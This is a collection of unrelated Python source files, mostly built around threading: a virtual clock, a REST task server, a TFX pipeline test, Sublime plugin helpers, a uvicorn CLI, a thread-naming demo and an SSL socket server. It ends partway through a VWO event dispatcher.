# SPDX-License-Identifier: MIT # Copyright (c) 2022 The Pybricks Authors import random import signal import threading import time class VirtualClock: nanoseconds: int = 0 """ The current clock time in nanoseconds. This value is read when ``pbdrv_clock_get_ms()`` or ``pbdrv_clock_get_us`` is called. """ _thread_id: int _signum: int def interrupt(self): """ Fires the clock "interrupt". This must not be called before :meth:`on_init`. """ signal.pthread_kill(self._thread_id, self._signum) def on_init(self, thread_id: int, signum: int): """ Called when ``pbdrv_clock_init()`` is called. Args: thread_id: The id of the thread to be interrupted. signum: The signal number to use when interrupting. """ self._thread_id = thread_id self._signum = signum @property def microseconds(self) -> int: """ The current clock time in microseconds. """ return self.nanoseconds // 1000 class WallClock(VirtualClock): """ Implementation of the virtual clock that uses the computer's own clock. """ @property def nanoseconds(self) -> int: return time.monotonic_ns() def on_init(self, thread_id: int, signum: int): super().on_init(thread_id, signum) threading.Thread(target=self.run, daemon=True).start() def run(self): # Provide the required 1 millisecond tick in "real" time. In reality, # this won't be accurate since desktop OSes are not realtime systems. while True: time.sleep(0.001) self.interrupt() class CountingClock(VirtualClock): """ Clock implementation that increases the current time by *step* microseconds each time :meth:`tick` is called. To create a clock that runs as fast as possible use the class like this:: class Platform(VirtualPlatform): def __init__(self): super().__init__() ... self.clock[-1] = CountingClock() self.subscribe_poll(self.clock[-1].tick) ... """ def __init__( self, start: int = (2**32 - 3) * 1000, step: int = 1000, fuzz: int = 100 ) -> None: """ Args: start: The starting time in microseconds. The default value is chosen so that the 32-bit millisecond clock and the 32-bit microsecond clock will both roll over in two virtual seconds. This is done to help expose code that may not be computing time differences correctly. step: The number of microseconds to increase the clock time by on each :meth:`tick`. The default value advances the virtual clock by 1 millisecond on each tick. fuzz: The amount of random variation to apply to *step* at each tick. This is done to help expose code that may not correctly handle small variations in timestamps. Setting to 0 will disable fuzzing. """ super().__init__() # convert microseconds to nanoseconds self.nanoseconds = start * 1000 self._step_ns = step * 1000 self._fuzz_ns = fuzz * 1000 def tick(self, *args): """ Increases the clock time by *step* +/- *fuzz* and triggers the clock interupt. This method has unused *args so that it can be passed directly to the :class:`VirtualPlatform` poll subscribe method. """ if self._fuzz_ns: self.nanoseconds += random.randint( self._step_ns - self._fuzz_ns, self._step_ns + self._fuzz_ns ) else: self.nanoseconds += self._step_ns self.interrupt()
app.py
import json import re import threading import time import logging from argparse import ArgumentParser from collections import deque from http import HTTPStatus from http.server import HTTPServer, BaseHTTPRequestHandler logging.basicConfig(level=logging.INFO) logger = logging.getLogger(__name__) ADDRESS = '0.0.0.0' PORT = 8000 API_VERSION = '1.0' API_URL = f'/api/v{API_VERSION}/tasks' TASKS_POLL_PERIOD_S = 0.1 run_thread = True cond_new_task = threading.Condition() tasks_queue = deque() class TaskStatus: queued = 'queued' running = 'running' done = 'done' error = 'error' class TaskType: reverse = 'reverse' reverse_time = 3 mix_even = 'mix_even' mix_even_time = 7 tasks = [ { 'id': 1, 'payload': 'sample task', 'type': 'reverse', 'status': 'done', 'result': 'sample task', }, ] class RestJsonHTTPRequestHandler(BaseHTTPRequestHandler): task_status_pattern = re.compile('/([0-9]+)/status[/]?') task_result_pattern = re.compile('/([0-9]+)/result[/]?') def get_tasks_list(self): self._send_json_data({'tasks': tasks}) def get_task_status(self, task_id_match): task = self._get_task(task_id_match) if not task: return self._send_json_data( {'task': {'id': task['id'], 'status': task['status']}}) def get_task_result(self, task_id_match): task = self._get_task(task_id_match) if not task: return if task['result'] is None: self._abort_not_found() self._send_json_data( {'task': {'id': task['id'], 'result': task['result']}}) def post_task(self): data_string = self.rfile.read( int(self.headers['Content-Length'])).decode() data = json.loads(data_string) try: task = { 'id': tasks[-1]['id'] + 1, 'payload': data['payload'], 'type': data['type'], 'status': TaskStatus.queued, 'result': None, } except KeyError: self._abort_bad_request() return tasks.append(task) tasks_queue.appendleft(task) with cond_new_task: cond_new_task.notify_all() self._send_json_data({'task': task}, status=HTTPStatus.CREATED) def do_GET(self): if not self.path.startswith(API_URL): self._abort_not_found() return sub_path = self.path.replace(API_URL, '', 1) if sub_path == '' or sub_path == '/': self.get_tasks_list() return task_id_status = self.task_status_pattern.search(sub_path) if task_id_status: self.get_task_status(task_id_status) return task_id_result = self.task_result_pattern.search(sub_path) if task_id_result: self.get_task_result(task_id_result) return self._abort_not_found() def do_POST(self): self.post_task() def _get_task(self, task_id_match): task_id = int(task_id_match.group(1)) task = list(filter(lambda t: t['id'] == task_id, tasks)) if len(task) == 0: self._abort_not_found() return None return task[0] def _send_end_response(self, code): self.send_response(code) self.send_header('Content-Type', 'application/json') self.end_headers() def _abort_not_found(self): self._send_json_data({'error': 'Not found'}, HTTPStatus.NOT_FOUND) def _abort_bad_request(self): self._send_end_response(HTTPStatus.BAD_REQUEST) self._send_json_data({'error': 'Bad request'}, HTTPStatus.NOT_FOUND) def _send_json_data(self, data, status=HTTPStatus.OK): self._send_end_response(status) self.wfile.write(json.dumps(data).encode()) def handle_tasks(): processor = TasksProcessor(TASKS_POLL_PERIOD_S) while run_thread: while run_thread: processor.process_queue() class TasksProcessor: def __init__(self, poll_time_s): self.poll_time_s = poll_time_s def process_queue(self): with cond_new_task: cond_new_task.wait(self.poll_time_s) if not tasks_queue: return task = tasks_queue.pop() self.process_task(task) def process_task(self, task): task['status'] = TaskStatus.running logging.info(f'Processing task {task["id"]}') if task['type'] == TaskType.reverse: time.sleep(TaskType.reverse_time) task['result'] = self.reverse_string(task['payload']) elif task['type'] == TaskType.mix_even: time.sleep(TaskType.mix_even_time) task['result'] = self.mix_even((task['payload'])) else: task['status'] = TaskStatus.error return task['status'] = TaskStatus.done logging.info(f'Task {task["id"]} processed') def reverse_string(self, data): return data[::-1] def mix_even(self, data): mixed = [] i = 0 while i < len(data): if i == len(data) - 1: mixed.append(data[i]) break mixed.append(data[i + 1]) mixed.append(data[i]) i += 2 return ''.join(mixed) class App: def __init__(self, addr, port): self.address = addr self.port = port def run(self): t = self.start_thread() self.run_server() self.stop_thread(t) def start_thread(self): t = threading.Thread(target=handle_tasks) t.daemon = True t.start() logger.info('Task queue started') return t def stop_thread(self, t): global run_thread run_thread = False with cond_new_task: cond_new_task.notify_all() t.join() logger.info('Task queue stopped') def run_server(self): httpd = HTTPServer((self.address, self.port), RestJsonHTTPRequestHandler) try: logger.info('Server started') httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() logger.info('Server stopped') if __name__ == '__main__': parser = ArgumentParser('HTTP REST-JSON API server') parser.add_argument('ip', default=ADDRESS, nargs='?', help='ip of server') parser.add_argument('port', default=PORT, type=int, nargs='?', help='port of server') args = parser.parse_args() app = App(args.ip, args.port) app.run()
pipeline_ops_test.py
# Copyright 2020 Google LLC. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for tfx.orchestration.experimental.core.pipeline_ops.""" import copy import os import threading import time from absl.testing.absltest import mock import tensorflow as tf from tfx.orchestration import metadata from tfx.orchestration.experimental.core import async_pipeline_task_gen from tfx.orchestration.experimental.core import pipeline_ops from tfx.orchestration.experimental.core import status as status_lib from tfx.orchestration.experimental.core import sync_pipeline_task_gen from tfx.orchestration.experimental.core import task as task_lib from tfx.orchestration.experimental.core import task_gen_utils from tfx.orchestration.experimental.core import task_queue as tq from tfx.orchestration.experimental.core import test_utils from tfx.orchestration.portable.mlmd import execution_lib from tfx.proto.orchestration import pipeline_pb2 from tfx.utils import test_case_utils as tu from ml_metadata.proto import metadata_store_pb2 def _test_pipeline(pipeline_id, execution_mode: pipeline_pb2.Pipeline.ExecutionMode = ( pipeline_pb2.Pipeline.ASYNC)): pipeline = pipeline_pb2.Pipeline() pipeline.pipeline_info.id = pipeline_id pipeline.execution_mode = execution_mode return pipeline class PipelineOpsTest(tu.TfxTest): def setUp(self): super(PipelineOpsTest, self).setUp() pipeline_root = os.path.join( os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()), self.id()) # Makes sure multiple connections within a test always connect to the same # MLMD instance. metadata_path = os.path.join(pipeline_root, 'metadata', 'metadata.db') self._metadata_path = metadata_path connection_config = metadata.sqlite_metadata_connection_config( metadata_path) connection_config.sqlite.SetInParent() self._mlmd_connection = metadata.Metadata( connection_config=connection_config) def test_initiate_pipeline_start(self): with self._mlmd_connection as m: # Initiate a pipeline start. pipeline1 = _test_pipeline('pipeline1') pipeline_state1 = pipeline_ops.initiate_pipeline_start(m, pipeline1) self.assertEqual(pipeline1, pipeline_state1.pipeline) self.assertEqual(metadata_store_pb2.Execution.NEW, pipeline_state1.execution.last_known_state) # Initiate another pipeline start. pipeline2 = _test_pipeline('pipeline2') pipeline_state2 = pipeline_ops.initiate_pipeline_start(m, pipeline2) self.assertEqual(pipeline2, pipeline_state2.pipeline) self.assertEqual(metadata_store_pb2.Execution.NEW, pipeline_state2.execution.last_known_state) # Error if attempted to initiate when old one is active. with self.assertRaises(status_lib.StatusNotOkError) as exception_context: pipeline_ops.initiate_pipeline_start(m, pipeline1) self.assertEqual(status_lib.Code.ALREADY_EXISTS, exception_context.exception.code) # Fine to initiate after the previous one is inactive. execution = pipeline_state1.execution execution.last_known_state = metadata_store_pb2.Execution.COMPLETE m.store.put_executions([execution]) pipeline_state3 = pipeline_ops.initiate_pipeline_start(m, pipeline1) self.assertEqual(metadata_store_pb2.Execution.NEW, pipeline_state3.execution.last_known_state) def test_initiate_pipeline_stop(self): with self._mlmd_connection as m: pipeline1 = _test_pipeline('pipeline1') pipeline_ops.initiate_pipeline_start(m, pipeline1) pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline1) pipeline_state = pipeline_ops._initiate_pipeline_stop(m, pipeline_uid) self.assertTrue(pipeline_state.is_stop_initiated()) def test_stop_pipeline_non_existent_or_inactive(self): with self._mlmd_connection as m: # Stop pipeline without creating one. with self.assertRaises(status_lib.StatusNotOkError) as exception_context: pipeline_ops.stop_pipeline( m, task_lib.PipelineUid(pipeline_id='foo', pipeline_run_id=None)) self.assertEqual(status_lib.Code.NOT_FOUND, exception_context.exception.code) # Initiate pipeline start and mark it completed. pipeline1 = _test_pipeline('pipeline1') execution = pipeline_ops.initiate_pipeline_start(m, pipeline1).execution pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline1) pipeline_ops._initiate_pipeline_stop(m, pipeline_uid) execution.last_known_state = metadata_store_pb2.Execution.COMPLETE m.store.put_executions([execution]) # Try to initiate stop again. with self.assertRaises(status_lib.StatusNotOkError) as exception_context: pipeline_ops.stop_pipeline(m, pipeline_uid) self.assertEqual(status_lib.Code.NOT_FOUND, exception_context.exception.code) def test_stop_pipeline_wait_for_inactivation(self): with self._mlmd_connection as m: pipeline1 = _test_pipeline('pipeline1') execution = pipeline_ops.initiate_pipeline_start(m, pipeline1).execution def _inactivate(execution): time.sleep(2.0) with pipeline_ops._PIPELINE_OPS_LOCK: execution.last_known_state = metadata_store_pb2.Execution.COMPLETE m.store.put_executions([execution]) thread = threading.Thread( target=_inactivate, args=(copy.deepcopy(execution),)) thread.start() pipeline_ops.stop_pipeline( m, task_lib.PipelineUid.from_pipeline(pipeline1), timeout_secs=5.0) thread.join() def test_stop_pipeline_wait_for_inactivation_timeout(self): with self._mlmd_connection as m: pipeline1 = _test_pipeline('pipeline1') pipeline_ops.initiate_pipeline_start(m, pipeline1) with self.assertRaisesRegex( status_lib.StatusNotOkError, 'Timed out.*waiting for execution inactivation.' ) as exception_context: pipeline_ops.stop_pipeline( m, task_lib.PipelineUid.from_pipeline(pipeline1), timeout_secs=1.0) self.assertEqual(status_lib.Code.DEADLINE_EXCEEDED, exception_context.exception.code) @mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator') @mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator') def test_generate_tasks_async_active_pipelines(self, mock_async_task_gen, mock_sync_task_gen): with self._mlmd_connection as m: # One active pipeline. pipeline1 = _test_pipeline('pipeline1') pipeline_ops.initiate_pipeline_start(m, pipeline1) # Another active pipeline (with previously completed execution). pipeline2 = _test_pipeline('pipeline2') execution2 = pipeline_ops.initiate_pipeline_start(m, pipeline2).execution execution2.last_known_state = metadata_store_pb2.Execution.COMPLETE m.store.put_executions([execution2]) execution2 = pipeline_ops.initiate_pipeline_start(m, pipeline2).execution # Inactive pipelines should be ignored. pipeline3 = _test_pipeline('pipeline3') execution3 = pipeline_ops.initiate_pipeline_start(m, pipeline3).execution execution3.last_known_state = metadata_store_pb2.Execution.COMPLETE m.store.put_executions([execution3]) # For active pipelines pipeline1 and pipeline2, there are a couple of # active executions. def _exec_node_tasks(): for pipeline_id in ('pipeline1', 'pipeline2'): yield [ test_utils.create_exec_node_task( node_uid=task_lib.NodeUid( pipeline_uid=task_lib.PipelineUid( pipeline_id=pipeline_id, pipeline_run_id=None), node_id='Transform')), test_utils.create_exec_node_task( node_uid=task_lib.NodeUid( pipeline_uid=task_lib.PipelineUid( pipeline_id=pipeline_id, pipeline_run_id=None), node_id='Trainer')) ] mock_async_task_gen.return_value.generate.side_effect = _exec_node_tasks() task_queue = tq.TaskQueue() pipeline_ops.generate_tasks(m, task_queue) self.assertEqual(2, mock_async_task_gen.return_value.generate.call_count) mock_sync_task_gen.assert_not_called() # Verify that tasks are enqueued in the expected order. for node_id in ('Transform', 'Trainer'): task = task_queue.dequeue() task_queue.task_done(task) self.assertTrue(task_lib.is_exec_node_task(task)) self.assertEqual(node_id, task.node_uid.node_id) self.assertEqual('pipeline1', task.node_uid.pipeline_uid.pipeline_id) for node_id in ('Transform', 'Trainer'): task = task_queue.dequeue() task_queue.task_done(task) self.assertTrue(task_lib.is_exec_node_task(task)) self.assertEqual(node_id, task.node_uid.node_id) self.assertEqual('pipeline2', task.node_uid.pipeline_uid.pipeline_id) self.assertTrue(task_queue.is_empty()) @mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator') @mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator') @mock.patch.object(task_gen_utils, 'generate_task_from_active_execution') def test_stop_initiated_async_pipelines(self, mock_gen_task_from_active, mock_async_task_gen, mock_sync_task_gen): with self._mlmd_connection as m: pipeline1 = _test_pipeline('pipeline1') pipeline1.nodes.add().pipeline_node.node_info.id = 'Transform' pipeline1.nodes.add().pipeline_node.node_info.id = 'Trainer' pipeline1.nodes.add().pipeline_node.node_info.id = 'Evaluator' pipeline_ops.initiate_pipeline_start(m, pipeline1) pipeline1_execution = pipeline_ops._initiate_pipeline_stop( m, task_lib.PipelineUid.from_pipeline(pipeline1)).execution task_queue = tq.TaskQueue() # For the stop-initiated pipeline, "Transform" execution task is in queue, # "Trainer" has an active execution in MLMD but no task in queue, # "Evaluator" has no active execution. task_queue.enqueue( test_utils.create_exec_node_task( node_uid=task_lib.NodeUid( pipeline_uid=task_lib.PipelineUid( pipeline_id='pipeline1', pipeline_run_id=None), node_id='Transform'))) transform_task = task_queue.dequeue() # simulates task being processed mock_gen_task_from_active.side_effect = [ test_utils.create_exec_node_task( node_uid=task_lib.NodeUid( pipeline_uid=task_lib.PipelineUid( pipeline_id='pipeline1', pipeline_run_id=None), node_id='Trainer'), is_cancelled=True), None, None, None, None ] pipeline_ops.generate_tasks(m, task_queue) # There are no active pipelines so these shouldn't be called. mock_async_task_gen.assert_not_called() mock_sync_task_gen.assert_not_called() # Simulate finishing the "Transform" ExecNodeTask. task_queue.task_done(transform_task) # CancelNodeTask for the "Transform" ExecNodeTask should be next. task = task_queue.dequeue() task_queue.task_done(task) self.assertTrue(task_lib.is_cancel_node_task(task)) self.assertEqual('Transform', task.node_uid.node_id) # ExecNodeTask for "Trainer" is next. task = task_queue.dequeue() task_queue.task_done(task) self.assertTrue(task_lib.is_exec_node_task(task)) self.assertEqual('Trainer', task.node_uid.node_id) self.assertTrue(task_queue.is_empty()) mock_gen_task_from_active.assert_has_calls([ mock.call( m, pipeline1, pipeline1.nodes[1].pipeline_node, mock.ANY, is_cancelled=True), mock.call( m, pipeline1, pipeline1.nodes[2].pipeline_node, mock.ANY, is_cancelled=True) ]) self.assertEqual(2, mock_gen_task_from_active.call_count) # Pipeline execution should continue to be active since active node # executions were found in the last call to `generate_tasks`. [execution] = m.store.get_executions_by_id([pipeline1_execution.id]) self.assertTrue(execution_lib.is_execution_active(execution)) # Call `generate_tasks` again; this time there are no more active node # executions so the pipeline should be marked as cancelled. pipeline_ops.generate_tasks(m, task_queue) self.assertTrue(task_queue.is_empty()) [execution] = m.store.get_executions_by_id([pipeline1_execution.id]) self.assertEqual(metadata_store_pb2.Execution.CANCELED, execution.last_known_state) def test_to_status_not_ok_error_decorator(self): @pipeline_ops._to_status_not_ok_error def fn1(): raise RuntimeError('test error 1') @pipeline_ops._to_status_not_ok_error def fn2(): raise status_lib.StatusNotOkError( code=status_lib.Code.ALREADY_EXISTS, message='test error 2') with self.assertRaisesRegex(status_lib.StatusNotOkError, 'test error 1') as ctxt: fn1() self.assertEqual(status_lib.Code.UNKNOWN, ctxt.exception.code) with self.assertRaisesRegex(status_lib.StatusNotOkError, 'test error 2') as ctxt: fn2() self.assertEqual(status_lib.Code.ALREADY_EXISTS, ctxt.exception.code) if __name__ == '__main__': tf.test.main()
utils.py
import sublime import os import sys import platform import subprocess import threading import socket import traceback import fnmatch DEBUG = True DEBUG = False PACKAGE_PATH = os.path.dirname(os.path.realpath(__file__)) RUN_PATH = os.path.join(PACKAGE_PATH, 'backend_run.js') if DEBUG: RUN_PATH = os.path.join(PACKAGE_PATH, 'backend', 'run.js') NODE_BIN = 'node' def initialize(): global NODE_BIN if NODE_BIN == 'node' or not bool(NODE_BIN): NODE_BIN = get_setting('node_bin', '') if not bool(NODE_BIN): NODE_BIN = find_executable('node') if not bool(NODE_BIN): NODE_BIN = 'node' def debug(s, data=None, force=False): if (DEBUG or force): message = str(s) if (data is not None): message = message + ': ' + str(data) print(message) def run_command(command, data=None, callback=None): global NODE_BIN debug('Run command', [NODE_BIN, command, data]) json = sublime.encode_value(data) err = None out = None try: (err, out) = exec([NODE_BIN, RUN_PATH, command, json]) except Exception as e: err = traceback.format_exc() if bool(err): if callback is not None: return callback(err, None) raise err debug('Trying to decode', out) result = sublime.decode_value(out) if callback is not None: return callback(None, result) return result def run_command_async(command, data=None, callback=None): thread = threading.Thread(target=run_command, args=(command, data, callback)) thread.start() def exec(cmd): if os.name == 'nt': si = subprocess.STARTUPINFO() si.dwFlags |= subprocess.SW_HIDE | subprocess.STARTF_USESHOWWINDOW proc = subprocess.Popen(cmd, cwd=PACKAGE_PATH, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=si) else: proc = subprocess.Popen(cmd, cwd=PACKAGE_PATH, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) outs, errs = proc.communicate() err = errs.decode().strip() if bool(err): debug('Exec error', err, True) return (err, outs.decode().strip()) def exec_async(cmd, done=None): def run_thread(cmd, done): (err, result) = exec(cmd) if (done is not None): done(err, result) return thread = threading.Thread(target=run_thread, args=(cmd, done)) thread.start() return thread def unixify(path): path = path.replace('\\', '/') ext3 = path[-3:] if (ext3 == '.ts' or ext3 == '.js'): return path[0:-3] ext4 = path[-4:] if (ext4 == '.tsx' or ext4 == '.jsx'): return path[0:-4] return path def get_panel_item(root, item): # Prepare string to show in window's quick panel. module = item.get('module') name = item.get('name') # TODO: Handle case when name is none (browserify) if name is None: return None if (module is not None): return module + '/' + name filepath = os.path.normpath(item['filepath'])[len(root) + 1:] return unixify(filepath) + '/' + name def norm_path(base, to): return os.path.normpath(os.path.join(os.path.dirname(base), to)) def on_done_func(choices, func): # Return a function which is used with sublime list picking. def on_done(index): if index >= 0: return func(choices[index]) return on_done def is_excluded_file(filepath, exclude_patterns): if exclude_patterns is None or len(exclude_patterns) == 0: return False for pattern in exclude_patterns: if fnmatch.fnmatch(filepath, pattern): return True if not os.path.isabs(pattern): if fnmatch.fnmatch(filepath, os.path.normpath('*/' + pattern + '/*')): return True if fnmatch.fnmatch(filepath, os.path.normpath('*/' + pattern)): return True if fnmatch.fnmatch(filepath, os.path.normpath(pattern + '/*')): return True return False def get_setting(name, default): result = None project_data = sublime.active_window().project_data() if project_data is not None: result = project_data.get(name) if result is None: settings = sublime.load_settings('import_helper.sublime-settings') or {} result = settings.get(name) if result is None: preferences = sublime.load_settings('Preferences.sublime-settings') result = preferences.get(name) if result is None: result = default return result def get_import_root(): window = sublime.active_window() project_file = window.project_file_name() if project_file is None: return None project_data = window.project_data() or {} result = project_data.get('import_root') if result is None: result = project_data['folders'][0]['path'] return norm_path(project_file, result) # https://gist.github.com/4368898 # Public domain code by anatoly techtonik <techtonik@gmail.com> # AKA Linux `which` and Windows `where` def find_executable(executable, path = None): """Find if 'executable' can be run. Looks for it in 'path' (string that lists directories separated by 'os.pathsep'; defaults to os.environ['PATH']). Checks for all executable extensions. Returns full path or None if no command is found. """ if path is None: path = os.environ['PATH'] paths = path.split(os.pathsep) extlist = [''] if os.name == 'os2': (base, ext) = os.path.splitext(executable) # executable files on OS/2 can have an arbitrary extension, but # .exe is automatically appended if no dot is present in the name if not ext: executable = executable + '.exe' elif sys.platform == 'win32': pathext = os.environ['PATHEXT'].lower().split(os.pathsep) (base, ext) = os.path.splitext(executable) if ext.lower() not in pathext: extlist = pathext for ext in extlist: execname = executable + ext if os.path.isfile(execname): return execname else: for p in paths: f = os.path.join(p, execname) if os.path.isfile(f): return f else: return None def get_exclude_patterns(): result = [] project_data = sublime.active_window().project_data() project_file = sublime.active_window().project_file_name() for folder in project_data['folders']: folder_exclude_patterns = folder.get('folder_exclude_patterns') if folder_exclude_patterns is None: folder_exclude_patterns = [] for pattern in folder_exclude_patterns: result.append(pattern) file_exclude_patterns = folder.get('file_exclude_patterns') if file_exclude_patterns is None: file_exclude_patterns = [] for pattern in file_exclude_patterns: result.append(pattern) return result
cli.py
import logging import os import threading import webbrowser from typing import Any, Dict, List import toml import typer import uvicorn from fps_uvicorn.config import UvicornConfig from fps.config import Config from fps.logging import configure_loggers, get_loggers_config from fps.utils import merge_dicts app = typer.Typer() def parse_extra_options(options: List[str]) -> Dict[str, Any]: def unnested_option(key: str, val: str, root: bool = True) -> Dict[str, Any]: if "." in key: k1, k2 = key.split(".", maxsplit=1) if not k1 or not k2: raise ValueError(f"Ill-formed option key '{key}'") try: return {k1: unnested_option(k2, val, False)} except ValueError as e: if root: raise ValueError(f"Ill-formed option key '{key}'") else: raise e else: if root: raise AttributeError( f"Plugin option must be of the form '<plugin-name>.<option>', got '{key}'" ) if "," in val: if val.startswith("[") and val.endswith("]"): return {key: [v for v in val[1:-1].split(",")]} else: return {key: [v for v in val.split(",")]} else: return {key: val} formatted_options: Dict[str, Any] = {} i = 0 while i < len(options): opt = options[i] # ill-formed extra config if not opt.startswith("--"): typer.echo(f"Optional config should start with '--', got '{opt}'") raise typer.Abort() if "=" in opt: # option is --key=value k, v = opt[2:].split("=", maxsplit=1) merge_dicts(formatted_options, unnested_option(k, v)) else: if i + 1 < len(options): # option if a flag --key if options[i + 1].startswith("--"): merge_dicts(formatted_options, unnested_option(opt[2:], "true")) # option is --key value else: merge_dicts( formatted_options, unnested_option(opt[2:], options[i + 1]) ) i += 1 # option if a flag --key else: merge_dicts(formatted_options, unnested_option(opt[2:], "true")) i += 1 return formatted_options def store_extra_options(options: Dict[str, Any]): if options: opts = parse_extra_options(options) f_name = "fps_cli_args.toml" with open(f_name, "w") as f: toml.dump(opts, f) os.environ["FPS_CLI_CONFIG_FILE"] = f_name @app.command( context_settings={"allow_extra_args": True, "ignore_unknown_options": True} ) def start( ctx: typer.Context, host: str = None, port: int = None, root_path: str = None, reload: bool = typer.Option( None, help=( "Enable/disable automatic reloading of the server when sources are modified" ), ), reload_dirs: str = ".", open_browser: bool = typer.Option( None, help=("Enable/disable automatic automatic opening of the browser"), ), config: str = None, workers: int = None, ): logger = logging.getLogger("fps") if config: if os.path.isfile(config): os.environ["FPS_EXTRA_CONFIG_FILE"] = config else: logger.error(f"Invalid configuration file '{config}'") exit(1) store_extra_options(ctx.args) Config.register("uvicorn", UvicornConfig) config = Config(UvicornConfig) host = host or config.host port = port or config.port root_path = root_path or config.root_path reload = reload if reload is not None else config.reload open_browser = open_browser if open_browser is not None else config.open_browser workers = workers or config.workers if open_browser: threading.Thread(target=launch_browser, args=(host, port), daemon=True).start() configure_loggers(("uvicorn", "uvicorn.access", "uvicorn.error")) uvicorn.run( "fps.main:app", host=host, port=port, root_path=root_path, workers=workers, log_config=get_loggers_config(), reload=reload, reload_dirs=reload_dirs, ) def launch_browser(host: str, port: int): webbrowser.open_new(f"{host}:{port}")
thread_names.py
from threading import Thread, current_thread import time import prctl def sleeper(): prctl.prctl(prctl.NAME, current_thread().name) while True: time.sleep(10) print "sleeping" threads = [Thread(target=sleeper, name="Sleeper01"), Thread(target=sleeper, name="Sleeper02"), Thread(target=sleeper, name="something else")] for t in threads: t.start() for t in threads: t.join()
server_socket.py
# -*- coding: utf-8 -*- import socket import ssl import threading import atexit class Cli: count = 0 def __init__(self, con_s, addr): Cli.count += 1 print("New connection:",addr[0],addr[1],"In total",Cli.count,"connections") self.con_s = con_s self.addr = addr self.topics = "" self.auth = False def recv(self, byt=1024): return self.con_s.recv(byt).decode() def exit(self): self.con_s.close() Cli.count -= 1 print(self.addr[0], self.addr[1], "disconnected") def send(self, data): print(self.addr[1], "Send", data) self.con_s.send(data.encode()) def subs(self, data): print(self.addr[1], "Subs", data) self.topics += data def unsubs(self, data): self.topics.replace(data, '') print(self.addr[1], 'Unsubs', data) def on_new_client(cs,addr):# global clientList cl = Cli(cs, addr) clientList.append(cl) while True: data = cl.recv() if len(data) < 1: pass elif cl.auth: if data == "q": cl.exit() clientList.remove(cl) return elif data[0] == "t": cl.subs(data[1:]) elif data[0] == "s": zus = "\n" if data[1] is "u" else "" for i in clientList: if data[1] in i.topics: i.send('s' + data[2:] + zus) elif data[0] == "d": cl.unsubs(data[1:]) elif data[0] == "c": cl.send('c' + str(Cli.count)) else: print(str(data)) elif data[0] == "a": if data[1:] == "PASSWORD": cl.auth = True print(addr[1],"authenticated") else: print(addr[1],"not authenticated") cl.exit() clientList.remove(cl) return def exit_handler(): global s, ssock for cl in clientList: cl.exit() s.close() ssock.close() print("Socket closed") atexit.register(exit_handler) # Register an exit handler for unsuspected exits like KeyboardInterrupt context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) context.load_cert_chain(certfile='ssl/cert.pem', keyfile='ssl/pv.key') PORT = 4444 MAXCON = 2 # Max connections s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) print('Socket created') s.bind((socket.gethostname(), PORT)) print('Socket connected') s.listen(5) ssock = context.wrap_socket(s, server_side=True) run = True clientList = [] while run: #accept connections from outside if Cli.count <= MAXCON: conn, address = ssock.accept() threading.Thread(target=on_new_client,args=(conn,address)).start() s.close()
event_dispatcher.py
# Copyright 2019-2021 Wingify Software Pvt. Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import threading from ..http.connection import Connection from ..services.usage_stats_manager import UsageStats from ..enums.log_message_enum import LogMessageEnum from ..enums.file_name_enum import FileNameEnum from ..enums.log_level_enum import LogLevelEnum from ..logger import VWOLogger from ..constants import constants FILE = FileNameEnum.Event.EventDispatcher class EventDispatcher(object): """ Class having request making/event dispatching capabilities to our servers""" def __init__(self, is_development_mode=False, batch_event_settings=None, sdk_key=None): """Initialize the dispatcher with logger Args: is_development_mode: To specify whether the request to our server should be made or not. """ self.logger = VWOLogger.getInstance() self.is_development_mode = is_development_mode self.connection = Connection() self.sdk_key = sdk_key self.sdk_v = constants.SDK_VERSION self.sdk = constants.SDK_NAME self.account_id = None self.queue = None self.queue_metadata = {} self.timer = None self.event_batching = False self.events_per_request = constants.BATCH_EVENTS.DEFAULT_EVENTS_PER_REQUEST self.request_time_interval = constants.BATCH_EVENTS.DEFAULT_REQUEST_TIME_INTERVAL self.flush_callback = None if batch_event_settings: self.event_batching = True self.queue = [] if batch_event_settings.get(constants.BATCH_EVENTS.EVENTS_PER_REQUEST): self.events_per_request = batch_event_settings.get(constants.BATCH_EVENTS.EVENTS_PER_REQUEST) if batch_event_settings.get(constants.BATCH_EVENTS.REQUEST_TIME_INTERVAL): self.request_time_interval = batch_event_settings.get(constants.BATCH_EVENTS.REQUEST_TIME_INTERVAL) if batch_event_settings.get(constants.BATCH_EVENTS.FLUSH_CALLBACK): self.flush_callback = batch_event_settings.get(constants.BATCH_EVENTS.FLUSH_CALLBACK) def dispatch(self, impression): """This method checks for development mode, if it is False then it sends the impression to our servers using a vwo.http.connection.Connection object, else return True without sending the impression. Args: impression (dict): Dictionary object containing the information of the impression Returns: bool: True if impression is successfully received by our servers, else false """ url = impression.pop("url") if self.is_development_mode: result = True else: result = False if self.event_batching is False: # sync API call resp = self.connection.get(url, params=impression) result = resp.get("status_code") == 200 else: result = self.async_dispatch(url, impression) if result is True: if self.event_batching is True: self.logger.log( LogLevelEnum.INFO, 